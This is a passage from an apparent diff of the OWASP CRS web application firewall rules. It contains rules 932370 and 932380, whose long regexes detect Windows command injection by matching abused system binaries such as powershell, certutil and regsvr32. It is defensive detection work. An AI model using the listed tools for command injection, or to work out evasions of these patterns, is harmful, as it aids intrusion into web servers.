x[\"\^]*(?:c[\"\^]*e[\"\^]*l|p[\"\^]*(?:a[\"\^]*n[\"\^]*d|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|t[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*r[\"\^]*t|r[\"\^]*a[\"\^]*c[\"\^]*3[\"\^]*2)))|f[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*s[\"\^]*t|g[\"\^]*e)[\"\^]*r|l[\"\^]*t[\"\^]*m[\"\^]*c|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|s[\"\^]*(?:i(?:[\"\^]*a[\"\^]*n[\"\^]*y[\"\^]*c[\"\^]*p[\"\^]*u)?|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*p)|g[\"\^]*(?:f[\"\^]*x[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*w[\"\^]*r[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*e[\"\^]*r|p[\"\^]*s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|h[\"\^]*h|i[\"\^]*(?:e[\"\^]*(?:4[\"\^]*u[\"\^]*i[\"\^]*n[\"\^]*i[\"\^]*t|a[\"\^]*d[\"\^]*v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*r[\"\^]*a[\"\^]*m[\"\^]*e)|l[\"\^]*a[\"\^]*s[\"\^]*m|m[\"\^]*e[\"\^]*w[\"\^]*d[\"\^]*b[\"\^]*l[\"\^]*d|n[\"\^]*(?:f[\"\^]*d[\"\^]*e[\"\^]*f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l|s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*u[\"\^]*t[\"\^]*i)[\"\^]*l)|j[\"\^]*s[\"\^]*c|l[\"\^]*(?:a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*-[\"\^]*v[\"\^]*s[\"\^]*d[\"\^]*e[\"\^]*v[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|d[\"\^]*i[\"\^]*f[\"\^]*d[\"\^]*e)|m[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*-[\"\^]*b[\"\^]*d[\"\^]*e|v[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t)|f[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|i[\"\^]*c[\"\^]*r[\"\^]*o[\"\^]*s[\"\^]*o[\"\^]*f[\"\^]*t|m[\"\^]*c|p[\"\^]*c[\"\^]*m[\"\^]*d[\"\^]*r[\"\^]*u[\"\^]*n|s[\"\^]*(?:(?:b[\"\^]*u[\"\^]*i[\"\^]*l|o[\"\^]*h[\"\^]*t[\"\^]*m[\"\^]*e)[\"\^]*d|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|d[\"\^]*(?:e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y|t)|h[\"\^]*t[\"\^]*(?:a|m[\"\^]*l)|i[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c|p[\"\^]*u[\"\^]*b|x[\"\^]*s[\"\^]*l))|n[\"\^]*(?:e[\"\^]*t[\"\^]*s[\"\^]*h|t[\"\^]*d[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f|f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e[\"\^]*s[\"\^]*c[\"\^]*a[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|n[\"\^]*e[\"\^]*d[\"\^]*r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*a[\"\^]*l[\"\^]*o[\"\^]*n[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*r|p[\"\^]*e[\"\^]*n[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e)|p[\"\^]*(?:c[\"\^]*(?:a[\"\^]*l[\"\^]*u[\"\^]*a|w[\"\^]*(?:r[\"\^]*u[\"\^]*n|u[\"\^]*t[\"\^]*l))|(?:e[\"\^]*s[\"\^]*t[\"\^]*e|s)[\"\^]*r|(?:k[\"\^]*t[\"\^]*m[\"\^]*o|u[\"\^]*b[\"\^]*p[\"\^]*r)[\"\^]*n|n[\"\^]*p[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|o[\"\^]*w[\"\^]*e[\"\^]*r[\"\^]*p[\"\^]*n[\"\^]*t|r[\"\^]*(?:e[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|i[\"\^]*n[\"\^]*t(?:[\"\^]*b[\"\^]*r[\"\^]*m)?|o[\"\^]*(?:c[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|t[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*l[\"\^]*h[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*e[\"\^]*r)))|r[\"\^]*(?:a[\"\^]*s[\"\^]*a[\"\^]*u[\"\^]*t[\"\^]*o[\"\^]*u|c[\"\^]*s[\"\^]*i|(?:d[\"\^]*r[\"\^]*l[\"\^]*e[\"\^]*a[\"\^]*k[\"\^]*d[\"\^]*i[\"\^]*a|p[\"\^]*c[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|e[\"\^]*(?:g(?:[\"\^]*(?:a[\"\^]*s[\"\^]*m|e[\"\^]*d[\"\^]*i[\"\^]*t|i[\"\^]*(?:n[\"\^]*i|s[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*-[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*v[\"\^]*i[\"\^]*d[\"\^]*e[\"\^]*r)|s[\"\^]*v[\"\^]*(?:c[\"\^]*s|r[\"\^]*3[\"\^]*2)))?|(?:m[\"\^]*o[\"\^]*t|p[\"\^]*l[\"\^]*a[\"\^]*c)[\"\^]*e)|u[\"\^]*n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|(?:e[\"\^]*x[\"\^]*e|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*p[\"\^]*e[\"\^]*r|o[\"\^]*n[\"\^]*c[\"\^]*e))|s[\"\^]*(?:c[\"\^]*(?:[\s\v,\.-/;-<>].*|h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|r[\"\^]*i[\"\^]*p[\"\^]*t[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r)|e[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*s|t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*y[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|u[\"\^]*p[\"\^]*a[\"\^]*p[\"\^]*i)|h[\"\^]*(?:d[\"\^]*o[\"\^]*c[\"\^]*v[\"\^]*w|e[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2)|q[\"\^]*(?:l[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p[\"\^]*e[\"\^]*r|(?:t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*)?p[\"\^]*s)|u[\"\^]*i[\"\^]*r[\"\^]*r[\"\^]*e[\"\^]*l)|s[\"\^]*h|t[\"\^]*o[\"\^]*r[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g|y[\"\^]*(?:n[\"\^]*c[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*v[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*l[\"\^]*i[\"\^]*s[\"\^]*h[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*v[\"\^]*e[\"\^]*r|s[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p))|t[\"\^]*(?:e[\"\^]*[\s\v,\.-/;-<>].*|r[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*e[\"\^]*r|t[\"\^]*(?:d[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t|t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r))|u[\"\^]*(?:n[\"\^]*r[\"\^]*e[\"\^]*g[\"\^]*m[\"\^]*p[\"\^]*2|p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e|r[\"\^]*l|t[\"\^]*i[\"\^]*l[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*f[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s)|v[\"\^]*(?:b[\"\^]*c|e[\"\^]*r[\"\^]*c[\"\^]*l[\"\^]*s[\"\^]*i[\"\^]*d|i[\"\^]*s[\"\^]*u[\"\^]*a[\"\^]*l[\"\^]*u[\"\^]*i[\"\^]*a[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y[\"\^]*n[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*v[\"\^]*e|s[\"\^]*(?:i[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h|j[\"\^]*i[\"\^]*t[\"\^]*d[\"\^]*e[\"\^]*b[\"\^]*u[\"\^]*g[\"\^]*g)[\"\^]*e[\"\^]*r)|w[\"\^]*(?:a[\"\^]*b|(?:f|m[\"\^]*i)[\"\^]*c|i[\"\^]*n[\"\^]*(?:g[\"\^]*e[\"\^]*t|r[\"\^]*m|w[\"\^]*o[\"\^]*r[\"\^]*d)|l[\"\^]*r[\"\^]*m[\"\^]*d[\"\^]*r|o[\"\^]*r[\"\^]*k[\"\^]*f[\"\^]*o[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*r[\"\^]*s|s[\"\^]*(?:(?:c[\"\^]*r[\"\^]*i[\"\^]*p|r[\"\^]*e[\"\^]*s[\"\^]*e)[\"\^]*t|l)|t[\"\^]*[\s\v,\.-/;-<>].*|u[\"\^]*a[\"\^]*u[\"\^]*c[\"\^]*l[\"\^]*t)|x[\"\^]*w[\"\^]*i[\"\^]*z[\"\^]*a[\"\^]*r[\"\^]*d|z[\"\^]*i[\"\^]*p[\"\^]*f[\"\^]*l[\"\^]*d[\"\^]*r)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932370,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# See rule 932370 above for further explanation. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932380.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932380 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r(?:[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)?|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|f|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[q-r])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*(?:o[\"\^]*l|s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*(?:e[\"\^]*r[\"\^]*e|o[\"\^]*a[\"\^]*m[\"\^]*i)|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932380,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + the source command (dot character) at PL2. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, 